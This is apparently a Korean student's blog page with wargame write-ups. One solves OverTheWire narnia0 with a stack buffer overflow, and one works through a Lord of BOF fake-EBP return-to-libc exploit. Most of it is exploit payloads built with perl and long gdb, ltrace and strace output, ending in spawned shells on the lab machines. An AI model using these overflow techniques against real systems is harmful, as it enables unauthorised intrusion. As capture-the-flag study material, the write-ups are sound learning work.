'STUDY' 카테고리의 글 목록 (3 Page)

엘오비 어렵슴다... ~~(롤을 끈다)~~

어렵슴다.. 어려워여.... 고로 팔공형님이 추천해주신 다른 워겜을 풀어보기로 했슴니다.

접속이 매우 힘들었습니다(고난이도)

인터넷떄문이기도 하고 비번도 못찾아서 때려맟췄고 키파일은 어디있는지 모르겠어서 남의 서버를 뒤적뒤적..

키파일 못찾음여. 인터넷을 뒤적뒤적하며 어디에 있는지 알아냈슴니다.

아래는 로그입니다. 엔터로 보기쉽게 써놓겠습니다

키는 제공하지 않습니다.

narnia0@melinda:~$ ls -al

total 20

drwxr-xr-x 2 root root 4096 Jun 6 2013 .

drwxr-xr-x 160 root root 4096 Oct 17 2013 ..

-rw-r--r-- 1 root root 220 Apr 3 2012 .bash_logout

-rw-r--r-- 1 root root 3486 Apr 3 2012 .bashrc

-rw-r--r-- 1 root root 675 Apr 3 2012 .profile

narnia0@melinda:~$ cd /narnia

narnia0@melinda:/narnia$ ls

narnia0 narnia1 narnia2 narnia3 narnia4 narnia5 narnia6 narnia7 narnia8

narnia0.c narnia1.c narnia2.c narnia3.c narnia4.c narnia5.c narnia6.c narnia7.c narnia8.c

narnia0@melinda:/narnia$ cat narnia0.c

#include <stdio.h>

#include <stdlib.h>

int main(){

long val=0x41414141;

char buf[20];

printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");

printf("Here is your chance: ");

scanf("%24s",&buf);

printf("buf: %s\n",buf);

printf("val: 0x%08x\n",val);

if(val==0xdeadbeef)

system("/bin/sh");

else {

printf("WAY OFF!!!!\n");

exit(1);

}

return 0;

}

narnia0@melinda:/narnia$ ./narnia0

Correct val's value from 0x41414141 -> 0xdeadbeef!

Here is your chance: a

buf: a

val: 0x41414141

WAY OFF!!!!

narnia0@melinda:/narnia$ (perl -e 'print "\x90"x20, "\xef\xbe\xad\xde"';cat)|./narnia0

Correct val's value from 0x41414141 -> 0xdeadbeef!

Here is your chance: buf: ﾭ

val: 0xdeadbeef

ls

narnia0 narnia1 narnia2 narnia3 narnia4 narnia5 narnia6 narnia7 narnia8

narnia0.c narnia1.c narnia2.c narnia3.c narnia4.c narnia5.c narnia6.c narnia7.c narnia8.c

cat key

cat: key: No such file or directory

whoami

narnia1

cat /etc/narnia_pass/narnia1

처음에 파일을 실행시키니 중간에 입력을 받습니다.

Lob에서도 썼었던건데, 파이프로 연결해 표춘입력으로 프로그램에 프로그램이 받는 값을 넣어둡니다. 이 경우 앞의 20바이트는 아무걸로나 채우고 뒤의 4바이트를 0xdeadbeef로 채워야겠죠. +)리틀엔디안-거꾸로 넣어야되져

그러면, 뙇!

저작자표시

'STUDY > overthewire' 카테고리의 다른 글

bandit [1~7] (0)	2014.05.17
narnia 1 (0)	2014.05.16

febp가 머져 먹는건가여 그렁가봉가

febp 이해하는데 사용한 링크들 적어둘께요(몇개는 못찾겠어여 엄청 좋은거 많았는데 다 검색기록 다 날리고 으허엏어헝)

http://sangu1ne.tistory.com/9 <<-여기 Sanguine형 블러그 여기 롸잇업 짱임여! 롸잇업 뿐만아니라 그냥 짱짱

http://1tchy.tistory.com/entry/fake-ebp <<-간지해커 잇치형의 블러그! 여기 역시 롸잇업 짱임!

이런분들 사이에 끼어 살다니 영광이빈다..

&&... cd80 ㅎ ㄳㄳㄳ

우선 지금 매우 피곤한 관계로 로그를 올려놓고 이만 자러가겟슴다.. 수정 내일해야지

login: assassin

Password:

Last login: Thu Apr 24 17:43:56 from 192.168.10.1

[assassin@localhost assassin]$ bash2

[assassin@localhost assassin]$ payload= [dummyx4, system()[0x40058ae0], dummyx4, binsh[0xbffffc79], nopx24] [sfp->buffer[0xbffffc1a]] [ret->leaveret[0x80484df]]

bash: syntax error near unexpected token `system()'

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -q ./newbie_assassin

(gdb) disas main

Dump of assembler code for function main:

0x8048440 <main>: push %ebp

0x8048441 <main+1>: mov %esp,%ebp

0x8048443 <main+3>: sub $0x28,%esp

0x8048446 <main+6>: cmpl $0x1,0x8(%ebp)

0x804844a <main+10>: jg 0x8048463 <main+35>

0x804844c <main+12>: push $0x8048540

0x8048451 <main+17>: call 0x8048354 <printf>

0x8048456 <main+22>: add $0x4,%esp

0x8048459 <main+25>: push $0x0

0x804845b <main+27>: call 0x8048364 <exit>

0x8048460 <main+32>: add $0x4,%esp

0x8048463 <main+35>: mov 0xc(%ebp),%eax

0x8048466 <main+38>: add $0x4,%eax

0x8048469 <main+41>: mov (%eax),%edx

0x804846b <main+43>: add $0x2f,%edx

0x804846e <main+46>: cmpb $0xbf,(%edx)

0x8048471 <main+49>: jne 0x8048490 <main+80>

0x8048473 <main+51>: push $0x804854c

0x8048478 <main+56>: call 0x8048354 <printf>

0x804847d <main+61>: add $0x4,%esp

0x8048480 <main+64>: push $0x0

0x8048482 <main+66>: call 0x8048364 <exit>

0x8048487 <main+71>: add $0x4,%esp

0x804848a <main+74>: lea 0x0(%esi),%esi

0x8048490 <main+80>: mov 0xc(%ebp),%eax

0x8048493 <main+83>: add $0x4,%eax

0x8048496 <main+86>: mov (%eax),%edx

0x8048498 <main+88>: add $0x2f,%edx

0x804849b <main+91>: cmpb $0x40,(%edx)

---Type <return> to continue, or q <return> to quit---

0x804849e <main+94>: jne 0x80484b7 <main+119>

0x80484a0 <main+96>: push $0x8048561

0x80484a5 <main+101>: call 0x8048354 <printf>

0x80484aa <main+106>: add $0x4,%esp

0x80484ad <main+109>: push $0x0

0x80484af <main+111>: call 0x8048364 <exit>

0x80484b4 <main+116>: add $0x4,%esp

0x80484b7 <main+119>: push $0x30

0x80484b9 <main+121>: mov 0xc(%ebp),%eax

0x80484bc <main+124>: add $0x4,%eax

0x80484bf <main+127>: mov (%eax),%edx

0x80484c1 <main+129>: push %edx

0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax

0x80484c5 <main+133>: push %eax

0x80484c6 <main+134>: call 0x8048374 <strncpy>

0x80484cb <main+139>: add $0xc,%esp

0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax

0x80484d1 <main+145>: push %eax

0x80484d2 <main+146>: push $0x804857e

0x80484d7 <main+151>: call 0x8048354 <printf>

0x80484dc <main+156>: add $0x8,%esp

0x80484df <main+159>: leave

0x80484e0 <main+160>: ret

0x80484e1 <main+161>: nop

0x80484e2 <main+162>: nop

0x80484e3 <main+163>: nop

0x80484e4 <main+164>: nop

0x80484e5 <main+165>: nop

0x80484e6 <main+166>: nop

0x80484e7 <main+167>: nop

---Type <return> to continue, or q <return> to quit---q

Quit

(gdb) b *main+160

Breakpoint 1 at 0x80484e0

(gdb) r `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

Starting program: /home/assassin/./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü

Breakpoint 1, 0x80484e0 in main ()

(gdb) x/wx $esp

0xbffffacc: 0x00000000

(gdb) r `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xaa\xbf", "\xdf\x84\x04\x08"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/assassin/./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xaa\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(üª¿߄

Breakpoint 1, 0x80484e0 in main ()

(gdb) x/wx $esp

0xbffffacc: 0x080484df

(gdb) x/i 0x80484df

0x80484df <main+159>: leave

(gdb) i r ebp

Ambiguous info command "r ebp": registers, remote-process.

(gdb) i reg ebp

ebp 0xbfaafc28 -1079313368

(gdb) set $ebp=0xbffffc28

(gdb) x/20wx 0xbffffc28

0xbffffc28: 0x6e697373 0x41414100 0x058ae041 0x42424240

0xbffffc38: 0x0fbff942 0x90909040 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x90909090 0x90909090 0xaafc2890

0xbffffc58: 0x0484dfbf 0x454c0008 0x504f5353 0x7c3d4e45

0xbffffc68: 0x7273752f 0x6e69622f 0x73656c2f 0x70697073

(gdb) x/20wx 0xbffffc2a

0xbffffc2a: 0x41006e69 0xe0414141 0x4240058a 0xf9424242

0xbffffc3a: 0x90400fbf 0x90909090 0x90909090 0x90909090

0xbffffc4a: 0x90909090 0x90909090 0x28909090 0xdfbfaafc

0xbffffc5a: 0x00080484 0x5353454c 0x4e45504f 0x752f7c3d

0xbffffc6a: 0x622f7273 0x6c2f6e69 0x70737365 0x2e657069

(gdb) x/20wx 0xbffffc2b

0xbffffc2b: 0x4141006e 0x8ae04141 0x42424005 0xbff94242

0xbffffc3b: 0x9090400f 0x90909090 0x90909090 0x90909090

0xbffffc4b: 0x90909090 0x90909090 0xfc289090 0x84dfbfaa

0xbffffc5b: 0x4c000804 0x4f535345 0x3d4e4550 0x73752f7c

0xbffffc6b: 0x69622f72 0x656c2f6e 0x69707373 0x732e6570

(gdb) x/20wx 0xbffffc9

0xbffffc9: Cannot access memory at address 0xbffffc9

(gdb) x/20wx 0xbffffc29

0xbffffc29: 0x006e6973 0x41414141 0x40058ae0 0x42424242

0xbffffc39: 0x400fbff9 0x90909090 0x90909090 0x90909090

0xbffffc49: 0x90909090 0x90909090 0x90909090 0xbfaafc28

0xbffffc59: 0x080484df 0x53454c00 0x45504f53 0x2f7c3d4e

0xbffffc69: 0x2f727375 0x2f6e6962 0x7373656c 0x65706970

(gdb) x/20wx 0xbffffc2d

0xbffffc2d: 0x41414141 0x40058ae0 0x42424242 0x400fbff9

0xbffffc3d: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc4d: 0x90909090 0x90909090 0xbfaafc28 0x080484df

0xbffffc5d: 0x53454c00 0x45504f53 0x2f7c3d4e 0x2f727375

0xbffffc6d: 0x2f6e6962 0x7373656c 0x65706970 0x2068732e

(gdb) q

The program is running. Exit anyway? (y or n) y

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2d\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@-ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@-ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0 0xf9424242 in ?? ()

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by ` AAAAAAAABBBBù¿@(ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0 0x42424242 in ?? ()

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x24\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@$ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@$ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0 0x41414141 in ?? ()

(gdb) q

[assassin@localhost assassin]$ ltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

[080483b1] __libc_start_main(0x08048440, 2, 0xbffffb24, 0x080482e4, 0x0804851c <unfinished ...>

[0804842b] __register_frame_info(0x08049590, 0x0804966c, 0xbffffae4, 0x08048309, 0x401081ec) = 0x40108d40

[080484cb] strncpy(0xbffffab0, "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 48) = 0xbffffab0

[080484dc] printf("%s\n", "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"...AAAA@BBBBù¿@

(ü ¿߄

) = 50

[8ae04141] --- SIGSEGV (Segmentation fault) ---

[ffffffff] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ sltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

bash2: sltrace: command not found

[assassin@localhost assassin]$ ltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

[080483b1] __libc_start_main(0x08048440, 2, 0xbffffb24, 0x080482e4, 0x0804851c <unfinished ...>

[0804842b] __register_frame_info(0x08049590, 0x0804966c, 0xbffffae4, 0x08048309, 0x401081ec) = 0x40108d40

[080484cb] strncpy(0xbffffab0, "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 48) = 0xbffffab0

[080484dc] printf("%s\n", "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"...AAAA@BBBBù¿@

*ü ¿߄

) = 50

[pid 4039] [40036cb5] --- SIGCHLD (Child exited) ---

[pid 4039] [42424242] --- SIGSEGV (Segmentation fault) ---

[pid 4039] [ffffffff] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿"], [/* 22 vars */]) = 0

[4000f78c] brk(0) = 0x8049684

[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)

[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

[4000ee8d] close(3) = 0

[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0

[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

[4000ee8d] close(3) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

[4000f891] munmap(0x40015000, 12210) = 0

[400ca7fd] personality(PER_LINUX) = 0

[400aa257] getpid() = 4043

[400bdc8c] fstat64(0x1, 0xbffff2f8) = -1 ENOSYS (Function not implemented)

[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿߄

) = 50

[40036ae2] rt_sigaction(SIGINT, {SIG_IGN}, {SIG_DFL}, 8) = 0

[40036ae2] rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

[40036cb5] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

[400a9cc8] vfork() = 4044

[400a98e9] wait4(4044, [WIFEXITED(s) && WEXITSTATUS(s) == 127], 0, NULL) = 4044

[40036ae2] rt_sigaction(SIGINT, {SIG_DFL}, NULL, 8) = 0

[40036ae2] rt_sigaction(SIGQUIT, {SIG_DFL}, NULL, 8) = 0

[40036cb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

[40036cb5] --- SIGCHLD (Child exited) ---

[42424242] --- SIGSEGV (Segmentation fault) ---

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "AAAA", "\xdf\x84\x04\x08"'`

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿AAAA"], [/* 22 vars */]) = 0

[4000f78c] brk(0) = 0x8049684

[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)

[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

[4000ee8d] close(3) = 0

[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0

[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

[4000ee8d] close(3) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

[4000f891] munmap(0x40015000, 12210) = 0

[400ca7fd] personality(PER_LINUX) = 0

[400aa257] getpid() = 4047

[400bdc8c] fstat64(0x1, 0xbffff2e8) = -1 ENOSYS (Function not implemented)

[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿AAAA

) = 50

[41414141] --- SIGSEGV (Segmentation fault) ---

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@*ü ¿AAAA'.

Program terminated with signal 11, Segmentation fault.

#0 0x41414141 in ?? ()

(gdb) x/20wx $esp-40

0xbffffaa8: 0x42424242 0x400fbff9 0x90909090 0x90909090

0xbffffab8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffac8: 0xbffffc2a 0x41414141 0x00000002 0xbffffb14

0xbffffad8: 0xbffffb20 0x40013868 0x00000002 0x08048390

0xbffffae8: 0x00000000 0x080483b1 0x08048440 0x00000002

(gdb) x/20wx $esp-60

0xbffffa94: 0x080484dc 0x0804857e 0xbffffaa0 0x41414141

0xbffffaa4: 0x40058ae0 0x42424242 0x400fbff9 0x90909090

0xbffffab4: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffac4: 0x90909090 0xbffffc2a 0x41414141 0x00000002

0xbffffad4: 0xbffffb14 0xbffffb20 0x40013868 0x00000002

(gdb) 6q

Undefined command: "6q". Try "help".

(gdb) q

[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "AAAA"'`

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿AAAA"], [/* 22 vars */]) = 0

[4000f78c] brk(0) = 0x8049684

[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)

[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

[4000ee8d] close(3) = 0

[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3

[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0

[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

[4000ee8d] close(3) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

[4000f891] munmap(0x40015000, 12210) = 0

[400ca7fd] personality(PER_LINUX) = 0

[400aa257] getpid() = 4051

[400bdc8c] fstat64(0x1, 0xbffff2f8) = -1 ENOSYS (Function not implemented)

[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿AAAA

) = 50

[41414141] --- SIGSEGV (Segmentation fault) ---

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process

[????????] +++ killed by SIGSEGV +++

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by `./newbie_assassin AAAA@BBBBù¿@*ü ¿AAAA'.

Program terminated with signal 11, Segmentation fault.

#0 0x41414141 in ?? ()

(gdb) x/50wx $esp-60

0xbffffaa4: 0x080484dc 0x0804857e 0xbffffab0 0x41414141

0xbffffab4: 0x40058ae0 0x42424242 0x400fbff9 0x90909090

0xbffffac4: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffad4: 0x90909090 0xbffffc2a 0x41414141 0x00000002

0xbffffae4: 0xbffffb24 0xbffffb30 0x40013868 0x00000002

0xbffffaf4: 0x08048390 0x00000000 0x080483b1 0x08048440

0xbffffb04: 0x00000002 0xbffffb24 0x080482e4 0x0804851c

0xbffffb14: 0x4000ae60 0xbffffb1c 0x40013e90 0x00000002

0xbffffb24: 0xbffffc18 0xbffffc2a 0x00000000 0xbffffc5b

0xbffffb34: 0xbffffc6e 0xbffffc86 0xbffffca5 0xbffffcc7

0xbffffb44: 0xbffffcd5 0xbffffe98 0xbffffeb7 0xbffffed5

0xbffffb54: 0xbffffeea 0xbfffff0a 0xbfffff15 0xbfffff26

0xbffffb64: 0xbfffff2e 0xbfffff38

(gdb) q

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@(ü ¿߄

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -c core -q

Core was generated by ` AAAAAAAABBBBù¿@(ü ¿'.

Program terminated with signal 11, Segmentation fault.

#0 0x42424242 in ?? ()

(gdb)x/40wx $esp

0xbffffc34: 0x400fbff9 0x90909090 0x90909090 0x90909090

0xbffffc44: 0x90909090 0x90909090 0x90909090 0xbffffc28

0xbffffc54: 0x080484df 0x44575000 0x6f682f3d 0x612f656d

0xbffffc64: 0x73617373 0x006e6973 0x4f4d4552 0x4f484554

0xbffffc74: 0x313d5453 0x312e3239 0x312e3836 0x00312e30

0xbffffc84: 0x54534f48 0x454d414e 0x636f6c3d 0x6f686c61

0xbffffc94: 0x6c2e7473 0x6c61636f 0x616d6f64 0x4c006e69

0xbffffca4: 0x4f535345 0x3d4e4550 0x73752f7c 0x69622f72

0xbffffcb4: 0x656c2f6e 0x69707373 0x732e6570 0x73252068

0xbffffcc4: 0x45535500 0x73613d52 0x73736173 0x4c006e69

(gdb) x/40wx $esp-40

0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc1c: 0x00000000 0x00000000 0x00000000 0x41414141

0xbffffc2c: 0x41414141 0x42424242 0x400fbff9 0x90909090

0xbffffc3c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc4c: 0x90909090 0xbffffc28 0x080484df 0x44575000

0xbffffc5c: 0x6f682f3d 0x612f656d 0x73617373 0x006e6973

0xbffffc6c: 0x4f4d4552 0x4f484554 0x313d5453 0x312e3239

0xbffffc7c: 0x312e3836 0x00312e30 0x54534f48 0x454d414e

0xbffffc8c: 0x636f6c3d 0x6f686c61 0x6c2e7473 0x6c61636f

0xbffffc9c: 0x616d6f64 0x4c006e69 0x4f535345 0x3d4e4550

(gdb) x/40wx $esp-100

0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x41414141 0x41414141

0xbffffc30: 0x42424242 0x400fbff9 0x90909090 0x90909090

0xbffffc40: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc50: 0xbffffc28 0x080484df 0x44575000 0x6f682f3d

0xbffffc60: 0x612f656d 0x73617373 0x006e6973 0x4f4d4552

(gdb) x/40wx $esp-200

0xbffffb6c: 0x00000000 0x00000000 0x40020e90 0x00000612

0xbffffb7c: 0x40021fd0 0x4001ad70 0x400143e0 0x00000003

0xbffffb8c: 0x40014650 0x00000001 0xbffff8ac 0x00000000

0xbffffb9c: 0x4003ec68 0x00000001 0x00000000 0x00000000

0xbffffbac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbbc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbcc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbdc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbec: 0x00000000 0x00000000 0x00000000 0x00000000

